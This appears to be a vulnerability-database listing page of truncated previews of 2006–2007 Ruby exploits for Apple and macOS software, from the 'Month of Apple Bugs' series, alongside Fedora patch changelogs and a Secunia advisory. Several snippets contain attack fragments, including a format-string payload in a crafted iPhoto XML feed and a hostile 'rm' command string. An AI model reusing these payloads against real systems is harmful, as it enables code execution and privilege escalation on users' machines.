Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST

!/usr/bin/ruby Copyright c Lance M. Havok Kevin Finisterre Proof of concept for issues described in MOAB-18-01-2007. require 'net/ftp' require 'socket' bugselected = ARGV0 || 0.toi targethost = ARGV1 || "localhost" targetuser = ARGV2 || "anonymous" targetpass = ARGV3 || "rumproast" def listbugo...

Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit

No description provided by source. !/usr/bin/ruby c Copyright 2006 Lance M. Havok [email protected] Makes use of the Colloquy INVITE format string vulnerability. require 'socket' targetchannel = ARGV0 || "whatever" targetserver = ARGV1 || "irc.server.org" targetport = ARGV2 || 6667 randnick =...

Fedora Core 6 : ruby-1.8.5-4.fc6 (2006-1109)

Fri Oct 27 2006 Akira TAGOH - 1.8.5-4 - security fix release. - ruby-1.8.5-cgi-CVE-2006-5467.patch: fix a CGI multipart parsing bug that causes the denial of service. 212396 - Sun Oct 1 2006 Jesse Keating - 1.8.5-3 - rebuilt for unwind info generation, broken in gcc-4.1.1-21 - Tue Sep 26 2006...

Fedora Core 5 : ruby-1.8.5-1.fc5 (2006-1110)

Fri Oct 27 2006 Akira TAGOH - 1.8.5-1 - security fix release. - ruby-1.8.5-cgi-CVE-2006-5467.patch: fix a CGI multipart parsing bug that causes the denial of service. 212396 - backport fixes from devel. - fixed rbconfig.rb to refer to DESTDIR for sitearchdir. 207311 - updates to 1.8.5 - removed...

Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service

!/usr/bin/ruby c Copyright 2006 Lance M. Havok Makes use of the Colloquy INVITE format string vulnerability. require 'socket' targetchannel = ARGV0 || "whatever" targetserver = ARGV1 || "irc.server.org" targetport = ARGV2 || 6667 randnick = "spongebo" channeljoined = false readytogo = false...

MOAB-05-01-2007.rb.txt

!/usr/bin/ruby c 2006 LMH Kevin Finisterre Thanks to The French Connection for bringing this in-the-wild 0-day to our attention. If /tmp/ps2 exists on your system, you've been pwned already. Thanks to the original authors of the exploit 'meow'. You know who you are. "They did it for the lulz" - A...

MOAB-09-01-2007.rb.txt

!/usr/bin/ruby c 2006 LMH . require 'fileutils' require 'zlib' hdiutil = "/usr/bin/hdiutil" dmgname = ARGV0 || "MOAB-09-01-2007.dmg" dmgsize = ARGV1 || "200k" filesys = ARGV2 || "UFS" volname = "" 255.times do volname i = Kernel.rand62; i += i 10 ? 48 : i 36 ? 55 : 61 .chr end FileUtils.rmfdmgnam...

Apple iLife iPhoto PhotoCast XML远程格式串漏洞

Apple iLife iPhoto PhotoCast是一款用于在网站上共享照片的工具。 Apple iLife iPhoto PhotoCast处理XML种子存在问题，远程攻击者可以利用漏洞进行格式串攻击，可能以应用程序进程权限执行任意指令。 通过构建特殊的iPhoto photocast XML feed，恶意用户可以导致iPhoto PhotoCast在处理"title"元素时出现格式串错误，造成远程任意代码执行。 Apple iLife iPhoto 6.0.5 316 目前没有详细解决方案提供： http://www.apple.com/ilife/iphoto/...

Application Enhancer (APE) 2.0.2 Local Privilege Escalation Exploit

Exploit for macOS platform in category local exploits =================================================================== Application Enhancer APE 2.0.2 Local Privilege Escalation Exploit =================================================================== !/usr/bin/ruby Exploit Of The Apes: A...

Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation

!/usr/bin/ruby c 2006 LMH Kevin Finisterre Thanks to The French Connection for bringing this in-the-wild 0-day to our attention. If /tmp/ps2 exists on your system, you've been pwned already. Thanks to the original authors of the exploit 'meow'. You know who you are. "They did it for the lulz" - A...

Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation

!/usr/bin/ruby c 2006 LMH code from the other exploit, porting Kevin Finisterre crontab rock and roll Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one. And works like a charm. require 'fileutils' EVILCOMMANDS = "rm...

Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit

Exploit for macOS platform in category local exploits ===================================================================== Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit ===================================================================== !/usr/bin/ruby c 2006 LMH Kevin...

MOAB-04-01-2007.rb.txt

!/usr/bin/ruby c 2006 LMH bug by Kevin Finisterre proof of concept for MOAB-04-01-2007 see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb require 'socket' IPHOTOFEED = "\r\n" + "\r\n" + "\r\n" + "" + "A" 256 + "%x.%n.%n.%n.%n.%n\r\n" + "\r\n" + "In Gruber We Trust\r\n" +...

iLife iPhoto Photocast (XML title) Remote Format String PoC

No description provided by source. !/usr/bin/ruby c 2006 LMH lmh at info-pull.com bug by Kevin Finisterre kflists at digitalmunition.com proof of concept for MOAB-04-01-2007 see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb require 'socket' IPHOTOFEED = "?xml version="1.0"...

iLife iPhoto Photocast (XML title) Remote Format String PoC

Exploit for macOS platform in category dos / poc =========================================================== iLife iPhoto Photocast XML title Remote Format String PoC =========================================================== !/usr/bin/ruby c 2006 LMH bug by Kevin Finisterre proof of concept for...

MOAB-01-01-2007.rb.txt

!/usr/bin/ruby Copyright c LMH Kevin Finisterre Notes: Our command string is loaded on memory at a static address normally, but this depends on execution method and the string length. The address set in this exploit will be likely successful if we open the resulting QTL file directly, without...

MOAB-03-01-2007.rb.txt

!/usr/bin/ruby c 2006 LMH Original scripting and POC by Aviv Raff http://aviv.raffon.net. Description: Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the fake FTP server required. HTTP server port can be modified but it's not recommended. Adjust as...

Apple Quicktime <= 7.1.3 (HREFTrack) Cross-Zone Scripting Exploit

No description provided by source. !/usr/bin/ruby c 2006 LMH lmh at info-pull.com Original scripting and POC by Aviv Raff http://aviv.raffon.net. Description: Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the...

Apple Quicktime (rtsp URL Handler) Stack Buffer Overflow Exploit

No description provided by source. !/usr/bin/ruby Copyright c LMH lmh at info-pull.com Kevin Finisterre kflists at digitalmunition.com Notes: Our command string is loaded on memory at a static address normally,...

[SA23465] tDiary Unspecified Ruby Code Execution Vulnerability

TITLE: tDiary Unspecified Ruby Code Execution Vulnerability SECUNIA ADVISORY ID: SA23465 VERIFY ADVISORY: http://secunia.com/advisories/23465/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: tDiary 2.x http://secunia.com/product/5496/ DESCRIPTION: Takagi Hiroshi has...